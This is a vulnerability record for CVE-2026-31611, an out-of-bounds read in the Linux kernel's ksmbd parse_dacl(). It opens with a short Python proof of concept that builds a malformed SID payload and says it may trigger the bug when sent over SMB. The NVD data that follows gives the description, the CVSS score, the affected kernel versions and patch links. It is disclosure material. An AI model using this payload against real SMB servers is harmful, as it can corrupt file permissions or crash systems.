CVE-2026-31611

import struct # This is a conceptual PoC to demonstrate the structure causing the OOB read. # It constructs a Security Descriptor (SD) with a specific SID that triggers the vulnerability. def build_malicious_sid(): # SID Revision: 1 # SubAuthorityCount: 2 (Triggers the bug, expects 3) # IdentifierAuthority: SECURITY_NT_AUTHORITY (5) # SubAuthorities: [88, 3] (Matches S-1-5-88-3) sid_revision = 1 sub_auth_count = 2 identifier_authority = b'\x00\x00\x00\x00\x00\x05' # S-1-5 sub_authorities = struct.pack('<II', 88, 3) sid = struct.pack('<B', sid_revision) sid += struct.pack('<B', sub_auth_count) sid += identifier_authority sid += sub_authorities # The ACE containing this SID should be placed at the end of the ACL. return sid # Note: Sending this to a vulnerable ksmbd server via SMB COM2/CREATE or SET_INFO # commands may trigger the out-of-bounds read in parse_dacl(). print(f"Malicious SID hex: {build_malicious_sid().hex()}")

{"cve": {"id": "CVE-2026-31611", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-24T15:16:40.360", "lastModified": "2026-04-29T16:56:48.940", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: require 3 sub-authorities before reading sub_auth[2]\n\nparse_dacl() compares each ACE SID against sid_unix_NFS_mode and on\nmatch reads sid.sub_auth[2] as the file mode. If sid_unix_NFS_mode is\nthe prefix S-1-5-88-3 with num_subauth = 2 then compare_sids() compares\nonly min(num_subauth, 2) sub-authorities so a client SID with\nnum_subauth = 2 and sub_auth = {88, 3} will match.\n\nIf num_subauth = 2 and the ACE is placed at the very end of the security\ndescriptor, sub_auth[2] will be 4 bytes past end_of_acl. The\nout-of-band bytes will then be masked to the low 9 bits and applied as\nthe file's POSIX mode, probably not something that is good to have\nhappen.\n\nFix this up by forcing the SID to actually carry a third sub-authority\nbefore reading it at all."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.15", "versionEndExcluding": "6.6.136", "matchCriteriaId": "B1ABA9F0-A5C4-4CBE-92EC-33CA7D4F7634"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.83", "matchCriteriaId": "7F0AE5B5-23AC-4DCC-B37A-51CA1DAE7BA8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.24", "matchCriteriaId": "8126B8B8-6D0B-4443-86C1-672AEE893555"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.14", "matchCriteriaId": "D6A8A074-BBF4-4803-ABED-519A839435BB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0", "versionEndExcluding": "7.0.1", "matchCriteriaId": "9B5888AB-7403-4335-89E4-21CC0B48366A"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/08f9e6d899b5c834bbcc239eae1bed58d9b15d2c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/46bbcd3ebfb3549c8da1838fc4493e79bd3241e7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/53370cf9090777774e07fd9a8ebce67c6cc333ab", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9401f86a224f37b50e6a3ccf1d46a70d5ef8af0a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b5b5d5936a50497fb151c0b122899a6894721c2b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d2454f4a002d08560a60f214f392e6491cf11560", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}